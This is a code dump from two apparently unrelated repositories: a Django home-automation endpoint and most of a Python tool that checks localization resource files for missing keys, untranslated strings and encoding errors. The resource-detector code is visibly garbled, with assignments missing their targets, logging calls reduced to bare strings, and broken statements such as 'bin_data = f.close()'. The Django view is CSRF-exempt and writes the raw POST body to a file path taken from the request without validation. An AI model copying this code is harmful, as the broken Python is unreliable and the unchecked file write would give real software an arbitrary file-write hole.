{ "source": "0CT3T/Daemon_Home_Integration", "score": 2 }
#### File: LED/Regle/ ```python from daemon.Module.Abstract.Rules import Rules class Allumer(Rules): def __init__(self, object): self.object = object super().__init__() def test(self): if self.object.getparamvalue("Mode") == "ETEINTE": self.object.setparamvalue("Mode", "ALLUMER") ``` #### File: src/restAPI/ ```python from __future__ import unicode_literals import sys from django.http import HttpResponse, Http404 from django.views.decorators.csrf import csrf_exempt from daemon.initialisation import * @csrf_exempt def home(request,fichier): if request.method == 'POST': print(request.body) with open(JSONdirectory + fichier, "w") as fichier: fichier.write(request.body.decode("utf-8") ) return HttpResponse(status=201) return Http404("only POST methode") ```
{ "source": "0Cubed/ZeroResourceDetector", "score": 2 }
#### File: 0Cubed/ZeroResourceDetector/ ```python import argparse import sys import os import codecs import logging import csv import importlib import re import string import locale import json import xml.etree.cElementTree as ET import pyparsing as PY from enum import Enum, IntEnum from datetime import datetime, timezone __author__ = "Zero<<EMAIL>>" __version__ = "1.0.0" __application__ = "resource detector" BASE_LANGUAGE = "en-us" STANDARDIZED_LANGUAGES = { #Tier0------------------------------------------------------------------------------------------- "en" : "en-us", "en-us" : "en-us", "1033" : "en-us", "english" : "en-us", "en_us" : "en-us", #Tier1------------------------------------------------------------------------------------------- "de" : "de-de", "de-de" : "de-de", "1031" : "de-de", "german" : "de-de", "de_de" : "de-de", "es" : "es-es", "es-es" : "es-es", "3082" : "es-es", "spanish" : "es-es", "es_es" : "es-es", "es-mx" : "es-es", "fr" : "fr-fr", "fr-fr" : "fr-fr", "1036" : "fr-fr", "french" : "fr-fr", "fr_fr" : "fr-fr", "ja" : "ja-jp", "ja-jp" : "ja-jp", "1041" : "ja-jp", "japanese" : "ja-jp", "ja_jp" : "ja-jp", "zh" : "zh-cn", "zh-cn" : "zh-cn", "2052" : "zh-cn", "chinese" : "zh-cn", "zh_cn" : "zh-cn", "zh-rcn" : "zh-cn", "zh-hans" : "zh-cn", "zh-chs" : "zh-cn", "zh_hans" : "zh-cn", "sc" : "zh-cn", "cn" : "zh-cn", #Tier2------------------------------------------------------------------------------------------- "ko" : "ko-kr", "ko-kr" : "ko-kr", "1042" : "ko-kr", "korean" : "ko-kr", "ko_kr" : "ko-kr", "ru" : "ru-ru", "ru-ru" : "ru-ru", "1049" : "ru-ru", "russian" : "ru-ru", "ru_ru" : "ru-ru", "tc" : "zh-tw", "zh-tw" : "zh-tw", "1028" : "zh-tw", "tw" : "zh-tw", "zh_tw" : "zh-tw", "zh-rtw" : "zh-tw", "zh-hant" : "zh-tw", "zh-cht" : "zh-tw", "zh_hant" : "zh-tw", #Tier3------------------------------------------------------------------------------------------- "ar" : "ar-sa", "ar-sa" : "ar-sa", "1025" : "ar-sa", "arabic" : "ar-sa", "ar_sa" : "ar-sa", "da" : "da-dk", "da-dk" : "da-dk", "1030" : "da-dk", "danish" : "da-dk", "da_dk" : "da-dk", "he" : "he-il", "he-il" : "he-il", "1037" : "he-il", "hebrew" : "he-il", "he_il" : "he-il", "it" : "it-it", "it-it" : "it-it", "1040" : "it-it", "italian" : "it-it", "it_it" : "it-it", "nl" : "nl-nl", "nl-nl" : "nl-nl", "1043" : "nl-nl", "dutch" : "nl-nl", "nl_nl" : "nl-nl", "no" : "no-no", "no-no" : "no-no", "1044" : "no-no", "norwegian" : "no-no", "no_no" : "no-no", "nb-no" : "no-no", "nb" : "no-no", "nn-no" : "no-no", "nn" : "no-no",#TBD "pt" : "pt-br", "pt-br" : "pt-br", "1046" : "pt-br", "portuguese" : "pt-br", "pt_br" : "pt-br", "pt" : "pt-br", "pt-pt" : "pt-pt", "2070" : "pt-pt", "portuguese" : "pt-br", "pt_pt" : "pt-pt", #Add some duplicate items to keep coding format "pl" : "pl-pl", "pl-pl" : "pl-pl", "1045" : "pl-pl", "polish" : "pl-pl", "pl_pl" : "pl-pl", "sv" : "sv-se", "sv-se" : "sv-se", "1053" : "sv-se", "swedish" : "sv-se", "sv_se" : "sv-se", #Others----------------------------------------------------------------------------------------------- "bg" : "bg-bg", "bg-bg" : "bg-bg", "lt" : "lt-lt", "lt-lt" : "lt-lt", "ca" : "ca-es", "ca-es" : "ca-es", "cs" : "cs-cz", "cs-cz" : "cs-cz", "cy" : "cy-gb", "cy-gb" : "cy-gb", "el" : "el-gr", "el-gr" : "el-gr", "fi" : "fi-fi", "fi-fi" : "fi-fi", "et" : "et-ee", "et-ee" : "et-ee", "hi" : "hi-in", "hi-in" : "hi-in", "hu" : "hu-hu", "hu-hu" : "hu-hu", "id" : "id-id", "id-id" : "id-id", "lv" : "lv-lv", "lv-lv" : "lv-lv", "ro" : "ro-ro", "ro-ro" : "ro-ro", "ru" : "ru-ru", "ru-ru" : "ru-ru", "sk" : "sk-sk", "sk-sk" : "sk-sk", "sl" : "sl-si", "sl-si" : "sl-si", "th" : "th-th", "th-th" : "th-th", "tr" : "tr-tr", "tr-tr" : "tr-tr", "uk" : "uk-ua", "uk-ua" : "uk-ua", "af" : "af-za", "af-za" : "af-za", "sq" : "sq-al", "sq-al" : "sq-al", "am" : "am-et", "am-et" : "am-et", "hy" : "hy-am", "hy-am" : "hy-am", "as" : "as-in", "as-in" : "as-in", "eu" : "eu-es", "eu-es" : "eu-es", "be" : "be-by", "be-by" : "be-by", "bn" : "bn-bd", "bn-bd" : "bn-bd", #TBD "ca" : "ca-es", "ca-es" : "ca-es", #TBD "gl" : "gl-es", "gl-es" : "gl-es", "ka" : "ka-ge", "ka-ge" : "ka-ge", "gu" : "gu-in", "gu-in" : "gu-in", "is" : "is-is", "is-is" : "is-is", "ga" : "ga-ie", "ga-ie" : "ga-ie", "xh" : "xh-za", "xh-za" : "xh-za", "zu" : "zu-za", "zu-za" : "zu-za", "kn" : "kn-in", "kn-in" : "kn-in", "kk" : "kk-kz", "kk-kz" : "kk-kz", "km" : "km-kh", "km-kh" : "km-kh", "rw" : "rw-rw", "rw-rw" : "rw-rw", "sw" : "sw-ke", "sw-ke" : "sw-ke", "lb" : "lb-lu", "lb-lu" : "lb-lu", "mk" : "mk-mk", "mk-mk" : "mk-mk", "ms" : "ms-bn", "ms-bn" : "ms-bn", #TBD "ml" : "ml-in", "ml-in" : "ml-in", "mt" : "mt-mt", "mt-mt" : "mt-mt", "mr" : "mr-in", "mr-in" : "mr-in", "ne" : "ne-np", "ne-np" : "ne-np", "or" : "or-in", "or-in" : "or-in", "fa" : "fa-ir", "fa-ir" : "fa-ir", "tn" : "tn-bw", "tn-bw" : "tn-bw", #TBD "si" : "si-lk", "si-lk" : "si-lk", "ta" : "ta-in", "ta-in" : "ta-in", "te" : "te-in", "te-in" : "te-in", "ti" : "ti-et", "ti-et" : "ti-et", "ur" : "ur-pk", "ur-pk" : "ur-pk", "vi" : "vi-vn", "vi-vn" : "vi-vn", "cy" : "cy-gb", "cy-gb" : "cy-gb", "wo" : "wo-sn", "wo-sn" : "wo-sn", "hr" : "hr-hr", "hr-hr" : "hr-hr", "hr-ba" : "hr-hr", #TBD "sr" : "sr-Latn", "sr-Latn" : "sr-Latn", #TBD "bs" : "bs-cyrl", "bs-cyrl" : "bs-cyrl", #TBD "pa" : "pa-arab", "pa-arab" : "pa-arab", #TBD "mi" : "mi-latn", "mi-latn" : "mi-latn", #TBD "nso" : "nso-za", "nso-za" : "nso-za", "quz" : "quz-bo", "quz-bo" : "quz-bo", #TBD "prs" : "prs-af", "prs-af" : "prs-af", #TBD "kok" : "kok-in", "kok-in" : "kok-in", "fil" : "fil-latn", "fil-latn" : "fil-latn", #TBD "gb-latn" : "gb-gb", "gb-gb" : "gb-gb", "ig-latn" : "ig-ng", "ig-ng" : "ig-ng", "yo-latn" : "yo-ng", "yo-ng" : "yo-ng", "ky-cyrl" : "ky-kg", "ky-kg" : "ky-kg", "tk-cyrl" : "tk-latn", "tk-latn" : "tk-latn", #TBD "tt-arab" : "tt-cyrl", "tt-cyrl" : "tt-cyrl", #TBD "tg-arab" : "tg-cyrl", "tg-cyrl" : "tg-cyrl", #TBD "iu-cans" : "iu-latn", "iu-latn" : "iu-latn", #TBD "mn-cyrl" : "mn-mong", "mn-mong" : "mn-mong", #TBD "az-arab" : "az-arab-az", "az-arab-az" : "az-arab-az", #TBD "sr-cyrl" : "sr-cyrl-cs", "sr-cyrl-cs" : "sr-cyrl-cs", #TBD "quc-latn" : "qut-gt", "qut-gt" : "qut-gt", #TBD "chr-cher" : "chr-cher-us", "chr-cher-us" : "chr-cher-us", #TBD "uz-latn-uz" : "uz-latn", "uz-latn" : "uz-latn", "sd-arab-pk" : "sd-arab", "sd-arab" : "sd-arab", #TBD "ha-latn-ng" : "ha-latn", "ha-latn" : "ha-latn", "ku-arab-iq" : "ku-arab", "ku-arab" : "ku-arab", } LANGUAGE_ENCODINGS = { #Tier0------------------------------------------------------ "en-us" : "cp1252", #Use "cp1252" instead of "ascii" here because sometimes English resource file can be successfully opened with the former but not the later #Tier1------------------------------------------------------ "de-de" : "cp1252", "es-es" : "cp1252", "fr-fr" : "cp1252", "ja-jp" : "shift_jis", #"cp932" "zh-cn" : "cp936", #Tier2------------------------------------------------------ "ko-kr" : "cp949", "ru-ru" : "cp1251", "zh-tw" : "big5", #"cp950" #Tier3------------------------------------------------------ "ar-sa" : "cp1256", "da-dk" : "cp865", "he-il" : "cp1255", "it-it" : "ascii", #TBD "nl-nl" : "ascii", #TBD "no-no" : "cp865", "pt-br" : "cp860", "pl-pl" : "ascii", #TBD "sv-se" : "ascii", #TBD } TAB_WIDTH = 4 LOG = None class Severity(Enum): warning = "warning" error = "error" class IssueCode(IntEnum): duplicate_key = 2000 missing_key = 2001 redundant_key = 2002 untranslated_value = 2003 unused_key = 2004 improperly_used_key = 2005 missing_file = 2006 redundant_file = 2007 unmatched_placeholder = 2008 format_error = 2009 encoding_error = 2010 class IssueName(Enum): duplicate_key = "duplicate key" missing_key = "missing key" redundant_key = "redundant key" untranslated_value = "untranslated value" unused_key = "unused key" improperly_used_key = "undefined key" missing_file = "missing file" redundant_file = "redundant file" unmatched_placeholder = "unmatched placeholder" format_error = "format error" encoding_error = "encoding error" class Description(Enum): duplicate_key = "duplicate key in resource file(s)" missing_key = "missing key in localized resource file(s)" redundant_key = "redundant key in localized resource file(s)" untranslated_value = "untranslated string value in localized resource file" unused_key = "unused key in resource file" improperly_used_key = "undefined resource key used in source code" missing_file = "missing resource file(s)" redundant_file = "redundant resource file(s)" unmatched_placeholder = "unmatched placeholder(s) in localized resource file" format_error = "string value with format error in resource file" encoding_error = "unknown or incorrect encoding of resource file" class Context(Enum): duplicate_key = "key=\<KEY>, language(s)=\u2308{1}\u2309" missing_key = "key=\<KEY>, language(s)=\u2308{1}\u2309" redundant_key = "key=\<KEY>, language(s)=\u2308{1}\u2309" untranslated_value = "key=\u2308{0}\u2309, value=\u2308{1}\u2309" unused_key = "key=\<KEY>" improperly_used_key = "{0}" missing_file = "language(s)=\u2308{0}\u2309" redundant_file = "language(s)=\u2308{0}\u2309" unmatched_placeholder = "key=\u2308{0}\u2309, base value=\u2308{1}\u2309, localized value=\u2308{2}\u2309" format_error = "key=\u2308{0}\u2309, value=\u2308{1}\u2309" encoding_error = "{0}" class Issue: def __init__(self, file, line, column_begin, column_begin_offset, column_end, severity, code, description, context, information = None): self.file= file self.line = line self.column_begin = column_begin self.column_begin_offset = column_begin_offset self.column_end = column_end self.code = code self.description = description self.severity = severity self.context = context self.information = information def write(self): issue = "file: {file}, ".format(file = self.file) if self.line or self.column_begin or self.column_end: issue += "line: {line}, column begin: {column_begin}, column end: {column_end}, ".format(line = self.line, column_begin = self.column_begin + self.column_begin_offset, column_end = self.column_end) issue += "issue: {description}, severity: {severity}, context: {context}".format(description = self.description.value, severity = self.severity.value, context = self.context.replace("\u2308", "").replace("\u2309", "")) if self.information: issue += ", information: {information}".format(information = self.information) def write_with_position(self):"file: {file}, line: {line}, column begin: {column_begin}, column end: {column_end}, issue: {description}, severity: {severity}, context: {context}".format(file = self.file, line = self.line, column_begin = self.column_begin + self.column_begin_offset, column_end = self.column_end, description = self.description.value, severity = self.severity.value, context = self.context.replace("\u2308", "").replace("\u2309", ""))) def write_without_position(self):"file: {file}, issue: {description}, severity: {severity}, context: {context}".format(file = self.file, description = self.description.value, severity = self.severity.value, context = self.context.replace("\u2308", "").replace("\u2309", ""))) class Issues: def __init__(self): self.issues = [] self.warnings = [] self.errors = [] self.issue_count = 0 self.warning_count = 0 self.error_count = 0 def add(self, issue): self.issues.append(issue) self.issue_count += 1 if issue.severity == Severity.warning: self.warnings.append(issue) self.warning_count += 1 elif issue.severity == Severity.error: self.errors.append(issue) self.error_count += 1 else: pass def extend(self, issues_add): if not issues_add: return self.issues.extend(issues_add.issues) self.warnings.extend(issues_add.warnings) self.errors.extend(issues_add.errors) self.issue_count += issues_add.issue_count self.warning_count += issues_add.warning_count self.error_count += issues_add.error_count def get_issues(self): for issue in self.issues: yield issue def get_warnings(self): for warning in self.warnings: yield warning def get_errors(self): for error in self.errors: yield error class BaseResFile: def __init__(self, directory, file, extension, language = None): = directory self.file = file self.extension = extension self.path = os.path.join(, self.file) if language: self.language = language else: self.language = self.get_language() self.keys = set() self.values = [] self.key_value_pairs = {} #self.key_line_pairs = {} self.duplicate_keys = [] self.escape_error_keys = [] self.item_count = 0 self.encoding_error = "" def reset_value_containers(self): self.keys = set() self.values = [] self.key_value_pairs = {} #self.key_line_pairs = {} self.duplicate_keys = [] self.escape_error_keys = [] self.item_count = 0 def get_language(self): sub_names = self.file.lower().split(".") try: sub_name = sub_names[-2] if sub_name in STANDARDIZED_LANGUAGES.keys(): return STANDARDIZED_LANGUAGES[sub_name] except IndexError: pass for sub_name in sub_names: if sub_name in STANDARDIZED_LANGUAGES.keys(): return STANDARDIZED_LANGUAGES[sub_name] sub_dirs = try: sub_dir = sub_dirs[-1] if sub_dir in STANDARDIZED_LANGUAGES.keys(): return STANDARDIZED_LANGUAGES[sub_dir] except IndexError: pass #Is the following necessary? Do we need to decide whether the other sub directory is language id besides the last sub directory? for sub_dir in sub_dirs: if sub_dir in STANDARDIZED_LANGUAGES.keys(): return STANDARDIZED_LANGUAGES[sub_dir] return BASE_LANGUAGE def is_file(self): return os.path.isfile(self.path) def read(self): try: f = open(self.path, "rb") bin_data = f.close() except Exception as e: LOG.error("Cannot open file '{path}' to read: {exception}".format(path = self.path, exception = e)) return None for bom, encoding in {codecs.BOM_UTF8 : "utf_8", codecs.BOM_UTF16_BE : "utf_16_be", codecs.BOM_UTF16_LE : "utf_16_le", codecs.BOM_UTF32_BE : "utf_32_be", codecs.BOM_UTF32_LE : "utf_32_le"}.items(): if bin_data.startswith(bom): try: return bin_data[len(bom):].decode(encoding) except UnicodeDecodeError: #LOG.error("Cannot read file '{path}', the real encoding is not the same as {encoding} encoding detected by BOM".format(path = self.path, encoding = encoding)) self.encoding_error = "the real encoding is not the same as '{encoding}' encoding detected by BOM".format(encoding = encoding) return None try: return bin_data.decode("utf_8") except UnicodeDecodeError: pass if self.language in LANGUAGE_ENCODINGS.keys(): try: return bin_data.decode(LANGUAGE_ENCODINGS[self.language]) except UnicodeDecodeError: pass try: return bin_data.decode("cp1252")#some localized resource files are not translated except UnicodeDecodeError: #LOG.error("Cannot read file '{0}', encoding is unknown".format(self.path)) self.encoding_error = "unknown encoding" return None else: #LOG.error("Cannot read file '{0}', encoding is unknown".format(self.path)) self.encoding_error = "unknown encoding" return None def get_group_id(self): sub_names = self.file.split(".") file_adjusted = "" for sub_name in sub_names: if not sub_name.lower() in STANDARDIZED_LANGUAGES.keys(): file_adjusted += sub_name #dir_adjusted = #base_name = os.path.basename( #if base_name in STANDARDIZED_LANGUAGES.keys(): # dir_adjusted = os.path.dirname( #return file_adjusted, dir_adjusted #remove language in whatever position instead of the last position: add language position as the third id(the position set to 1 if there is no language) sub_dirs = dir_adjusted = sub_dirs index = 0 for sub_dir in sub_dirs: if sub_dir.lower() in STANDARDIZED_LANGUAGES.keys(): dir_adjusted.remove(sub_dir) break index += 1 return file_adjusted, os.sep.join(dir_adjusted), index def parse(self, parsing_patterns = None): pass class ResFileGroup: def __init__(self, base_res_file = None): self.res_files = {} self.localized_res_files = {} self.base_res_file = base_res_file #TODO: check whether the language of base_res_file is BASE_LANGUAGE if base_res_file: self.res_files[base_res_file.language] = base_res_file def add_resource_file(self, res_file): #TODO: check the language of current file exists in group self.res_files[res_file.language] = res_file if res_file.language != BASE_LANGUAGE: self.localized_res_files[res_file.language] = res_file else: if self.base_res_file: LOG.warning("Two English resource files found in a group. If the languages of them are wrongly-determined, contact the tool author, otherwise remove unused resource file in source code or check the configuration file to make sure correct resource file is used. Two suspect resource files are:\n '{base_file}'\n '{current_file}'".format(base_file = self.base_res_file.path, current_file = res_file.path)) self.base_res_file = res_file class BaseResDetector: def __init__(self, dir_input, res_files_input, config_input, type_input): self.src_dir = dir_input self.config = config_input self.detect_languages = set() self.detect_issues = set() self.res_files = res_files_input self.res_file_type = type_input self.res_file_ext = self.res_files[0].extension self.res_file_groups = [] self.issues = Issues() self.res_file_count = 0 self.item_count = 0 def detect(self): self.group_resource_files() self.parse_resource_files() self.filter_resource_file_groups() self.get_detect_languages() self.get_detect_issues() self.detect_duplicate_keys() self.detect_missing_keys() self.detect_redundant_keys() self.detect_untranslated_values() self.detect_unused_and_undefined_keys() self.detect_missing_resource_files() self.detect_redundant_resource_files() self.detect_unmatched_placeholders() self.detect_values_with_format_error() self.detect_encoding_errors() def print_group(self): for res_file_group in self.res_file_groups: for language, res_file in sorted(res_file_group.res_files.items()): res_file_info = res_file.path + " " + language if res_file == res_file_group.base_res_file: res_file_info += "------base------""************************************************************************************************************************") def write_configuration(self): self.group_resource_files() self.parse_resource_files() self.filter_resource_file_groups() self.get_detect_languages() self.get_detect_issues() config_file = open(file = self.config.config_file_path, mode = "a", encoding = "utf_8_sig")"Writing configuration...") config_file.write(self.config.detector_switch_attrs[self.res_file_type] + " = True\n") config_file.write("{attr_name} = [{detect_issues}]\n".format(attr_name = self.config.detect_issues_attrs[self.res_file_type], detect_issues = ", ".join(['"{item}"'.format(item = item.value) for item in IssueName if item.value in self.detect_issues]))) config_file.write(self.config.detect_languages_attrs[self.res_file_type] + " = [") for language in sorted(self.detect_languages): config_file.write("\"" + language + "\", ") config_file.write("]\n") config_file.write(self.config.fixed_res_groups_attrs[self.res_file_type] + " = True\n") config_file.write(self.config.res_groups_attrs[self.res_file_type] + " =\\\n[\n") for res_file_group in self.res_file_groups: config_file.write("{\n") for language, res_file in sorted(res_file_group.res_files.items()): config_file.write("\"" + language + "\" : R\"" + res_file.path + "\",\n") config_file.write("},\n") config_file.write("]\n\n\n") config_file.close() def group_resource_files(self): use_fixed_res_file_group = True if self.config.use_user_config: try: use_fixed_res_file_group = getattr(self.config.config_module, self.config.fixed_res_groups_attrs[self.res_file_type]) except AttributeError: pass if self.config.use_user_config and use_fixed_res_file_group:"Reading resource file group information from configuration file...") try: res_file_groups_config = getattr(self.config.config_module, self.config.res_groups_attrs[self.res_file_type]) except AttributeError: LOG.critical("'{group_name}' is not defined in configuration file".format(group_name = self.config.res_groups_attrs[self.res_file_type])) quit_application(-1) for res_file_group_config in res_file_groups_config: res_file_group = ResFileGroup() for language_key, path in res_file_group_config.items(): absolute_path = os.path.join(self.src_dir, path) directory = os.path.dirname(absolute_path) file = os.path.basename(absolute_path) if not file.endswith("." + self.res_file_ext): LOG.critical("'{file}' is not a '{type}' resource file".format(file = absolute_path, type = self.res_file_ext)) quit_application(-1) if not os.path.isfile(absolute_path): LOG.critical("'{path}' does not exist".format(path = absolute_path)) quit_application(-1) language = None try: language = STANDARDIZED_LANGUAGES[language_key] except KeyError: LOG.critical("'{language_key}' is not a valid language, please refer to the following: {standardized_languages}".format(language_key = language_key, standardized_languages = "'" + "', '".join(STANDARDIZED_LANGUAGES.keys()) + "'.")) quit_application(-1) res_file = self.config.res_file_classes[self.res_file_type](directory , file, self.res_file_ext, language) res_file_group.add_resource_file(res_file) self.res_file_groups.append(res_file_group) else:"Grouping resource files...") id_group_pairs = {} for res_file in self.res_files: group_id = res_file.get_group_id() res_file_group = id_group_pairs.get(group_id) if res_file_group: res_file_group.add_resource_file(res_file) else: res_file_group = ResFileGroup() res_file_group.add_resource_file(res_file) id_group_pairs[group_id] = res_file_group self.res_file_groups.append(res_file_group) def get_detect_issues(self): if self.config.use_user_config:"Reading issue types to be detected from configuration file...") self.detect_issues = getattr(self.config.config_module, self.config.detect_issues_attrs[self.res_file_type], self.config.default_detect_issues) else:"Getting default issue types to be detected...") self.detect_issues = self.config.default_detect_issues def get_detect_languages(self): if self.config.use_user_config:"Reading languages to be detected from configuration file...") try: self.detect_languages = set(getattr(self.config.config_module, self.config.detect_languages_attrs[self.res_file_type])) except AttributeError: LOG.critical("Cannot read languages from configuration files") quit_application(-1) else:"Determining languages to be detected...") language_counts = {} max_count = 0 for res_file_group in self.res_file_groups: num = len(res_file_group.res_files.keys()) if num != 1: if not num in language_counts.keys(): language_counts[num] = 0 language_counts[num] += 1 current_count = language_counts[num] if current_count > max_count: max_count = current_count self.detect_languages = set(res_file_group.res_files.keys()) elif current_count == max_count: current_languages = set(res_file_group.res_files.keys()) if len(current_languages) > len(self.detect_languages): self.detect_languages = current_languages else: pass if max_count == 0: try: self.detect_languages = set(self.res_file_groups[0].res_files.keys()) except IndexError: pass"Detect language(s): {languages}".format(languages = " ".join(sorted(self.detect_languages)))) def get_parsing_patterns(self): return None def parse_resource_files(self):"Parsing resource files, which may take some time...") parsing_patterns = self.get_parsing_patterns() for res_file_group in self.res_file_groups: for language, res_file in res_file_group.res_files.items(): res_file.parse(parsing_patterns) self.item_count += res_file.item_count def filter_resource_file_groups(self):"Removing group where each file has no string...") temp_groups = list(self.res_file_groups) self.res_file_groups = [] for res_file_group in temp_groups: qualified_flag = False for language, res_file in res_file_group.res_files.items(): if (res_file.item_count != 0) or res_file.encoding_error: qualified_flag = True if qualified_flag: self.res_file_groups.append(res_file_group) self.res_file_count += len(res_file_group.res_files) def detect_missing_resource_files(self): if IssueName.missing_file.value not in self.detect_issues: return"Detecting missing localized resource files...") for res_file_group in self.res_file_groups: base_res_file = res_file_group.base_res_file if not base_res_file: continue missing_languages = self.detect_languages - set(res_file_group.res_files.keys()) formatted_languages = "/".join(sorted(missing_languages)) if formatted_languages: issue = Issue(file = base_res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.missing_file, description = Description.missing_file, severity = Severity.warning, context = Context.missing_file.value.format(formatted_languages)) self.issues.add(issue) def detect_redundant_resource_files(self): if IssueName.redundant_file.value not in self.detect_issues: return"Detecting redundant localized resource files...") for res_file_group in self.res_file_groups: base_res_file = res_file_group.base_res_file if not base_res_file: continue redundant_languages = set(res_file_group.res_files.keys()) - self.detect_languages formatted_languages = "/".join(sorted(redundant_languages)) if formatted_languages: issue = Issue(file = base_res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.redundant_file, description = Description.redundant_file, severity = Severity.warning, context = Context.redundant_file.value.format(formatted_languages)) self.issues.add(issue) def detect_duplicate_keys(self): if IssueName.duplicate_key.value not in self.detect_issues: return"Detecting duplicate keys in resource files...") for res_file_group in self.res_file_groups: base_res_file = res_file_group.base_res_file if not base_res_file: continue key_languages = {} for language, res_file in sorted(res_file_group.res_files.items()): for duplicate_key in res_file.duplicate_keys: duplicate_languages = key_languages.get(duplicate_key, None) if duplicate_languages: key_languages[duplicate_key] = duplicate_languages + "/" + language else: key_languages[duplicate_key] = language for duplicate_key, duplicate_languages in sorted(key_languages.items()): issue = Issue(file = base_res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.duplicate_key, description = Description.duplicate_key, severity = Severity.error, context = Context.duplicate_key.value.format(duplicate_key, duplicate_languages)) self.issues.add(issue) def detect_missing_keys(self): if IssueName.missing_key.value not in self.detect_issues: return"Detecting missing keys in localized resource files...") for res_file_group in self.res_file_groups: base_res_file = res_file_group.base_res_file if not base_res_file: continue base_keys = base_res_file.keys key_languages = {} for language, res_file in sorted(res_file_group.localized_res_files.items()): missing_keys = base_keys - res_file.keys for missing_key in missing_keys: missing_languages = key_languages.get(missing_key, None) if missing_languages: key_languages[missing_key] = missing_languages + "/" + language else: key_languages[missing_key] = language for missing_key, missing_languages in sorted(key_languages.items()): issue = Issue(file = base_res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.missing_key, description = Description.missing_key, severity = Severity.error, context = Context.missing_key.value.format(missing_key, missing_languages)) self.issues.add(issue) def detect_redundant_keys(self): if IssueName.redundant_key.value not in self.detect_issues: return"Detecting redundant keys in localized resource files...") for res_file_group in self.res_file_groups: base_res_file = res_file_group.base_res_file if not base_res_file: continue base_keys = base_res_file.keys key_languages = {} for language, res_file in sorted(res_file_group.localized_res_files.items()): redundant_keys = res_file.keys - base_keys for redundant_key in redundant_keys: redundant_languages = key_languages.get(redundant_key, None) if redundant_languages: key_languages[redundant_key] = redundant_languages + "/" + language else: key_languages[redundant_key] = language for redundant_key, redundant_languages in sorted(key_languages.items()): issue = Issue(file = base_res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.redundant_key, description = Description.redundant_key, severity = Severity.error, context = Context.redundant_key.value.format(redundant_key, redundant_languages)) self.issues.add(issue) def is_translation_necessary(self, value): if not value: return False if value.isnumeric(): return False #cannot make sure url is not necessary to be translated #if value.startswith("http://") or value.startswith("https://"): #return False return True def detect_untranslated_values(self): if IssueName.untranslated_value.value not in self.detect_issues: return"Detecting untranslated values in resource files...") for res_file_group in self.res_file_groups: base_res_file = res_file_group.base_res_file if not base_res_file: continue base_keys = base_res_file.keys sorted_base_keys = sorted(base_keys) base_key_value_pairs = base_res_file.key_value_pairs for language, res_file in sorted(res_file_group.localized_res_files.items()): target_keys = res_file.keys target_key_value_pairs = res_file.key_value_pairs for key in sorted_base_keys: if key in target_keys: target_value = target_key_value_pairs[key] if (base_key_value_pairs[key] == target_value) and self.is_translation_necessary(target_value): issue = Issue(file = res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.untranslated_value, description = Description.untranslated_value, severity = Severity.warning, context = Context.untranslated_value.value.format(key, target_value)) self.issues.add(issue) def detect_values_with_format_error(self): if IssueName.format_error.value not in self.detect_issues: return"Detecting string value format issues in resource files...") for res_file_group in self.res_file_groups: for language, res_file in sorted(res_file_group.res_files.items()): key_value_pairs = res_file.key_value_pairs for escape_error_key in res_file.escape_error_keys: issue = Issue(file = res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.format_error, description = Description.format_error, severity = Severity.error, context = Context.format_error.value.format(escape_error_key, key_value_pairs[escape_error_key])) self.issues.add(issue) def get_placeholder_pattern(self): return None def detect_unmatched_placeholders(self): if IssueName.unmatched_placeholder.value not in self.detect_issues: return"Detecting unmatched placeholders in localized resource files...") placeholder_pattern = self.get_placeholder_pattern() if not placeholder_pattern:"Placeholder pattern is not defined, skip detection") return for res_file_group in self.res_file_groups: base_res_file = res_file_group.base_res_file if not base_res_file: continue base_key_value_pairs = base_res_file.key_value_pairs sorted_localized_res_files = sorted(res_file_group.localized_res_files.items()) for base_key, base_value in sorted(base_key_value_pairs.items()):#If this sorting cosumes a lot of time, sorting detection result instead base_placeholders = {}"scanning string: {0}".format(base_value)) for tokens, start, end in placeholder_pattern.scanString(base_value): placeholder = tokens[0] if placeholder in base_placeholders.keys(): base_placeholders[placeholder] += 1 else: base_placeholders[placeholder] = 1 if not base_placeholders: continue for language, res_file in sorted_localized_res_files: target_keys = res_file.keys target_key_value_pairs = res_file.key_value_pairs target_placeholders = {} if base_key in target_keys: target_value = target_key_value_pairs[base_key] for tokens, start, end in placeholder_pattern.scanString(target_value): placeholder = tokens[0] if placeholder in target_placeholders.keys(): target_placeholders[placeholder] += 1 else: target_placeholders[placeholder] = 1 if not base_placeholders == target_placeholders:",".join(base_placeholders.keys()) + "---" + ",".join(target_placeholders.keys())) issue = Issue(file = res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.unmatched_placeholder, description = Description.unmatched_placeholder, severity = Severity.error, context = Context.unmatched_placeholder.value.format(base_key, base_value, target_value)) self.issues.add(issue) def detect_unused_and_undefined_keys(self): pass def detect_encoding_errors(self): if IssueName.encoding_error.value not in self.detect_issues: return"Detecting resource file encoding errors...") for res_file_group in self.res_file_groups: for language, res_file in sorted(res_file_group.res_files.items()): if res_file.encoding_error: issue = Issue(file = res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.encoding_error, description = Description.encoding_error, severity = Severity.error, context = Context.encoding_error.value.format(res_file.encoding_error)) self.issues.add(issue) class RcResFile(BaseResFile): def parse(self, parsing_patterns): data = if not data: LOG.warning("There is no data in file '{path}'".format(path = self.path)) return try: string_table, key_value_pair = parsing_patterns for table_content_token, start_location, end_location in string_table.scanString(data): for tokens, start, end in key_value_pair.scanString(table_content_token[0]): for token in tokens: key = token[0] value = token[1] pure_value = value[1:-1] #compare values to decide whether it is duplicated, workaround for Receiver for Windows since there are many #ifdef statements if key in self.keys and pure_value == self.key_value_pairs[key]: self.duplicate_keys.append(key) self.keys.add(key) self.values.append(pure_value) self.key_value_pairs[key] = pure_value self.item_count += 1 except Exception as e: LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e)) self.reset_value_containers() return class RcResDetector(BaseResDetector): def get_parsing_patterns(self): key = PY.Word(PY.alphas + "_", PY.alphanums + "_") | PY.Word(PY.nums) value = PY.dblQuotedString define_patterns = PY.Regex(R"#ifdef.*") | PY.Regex(R"#ifndef.*") | 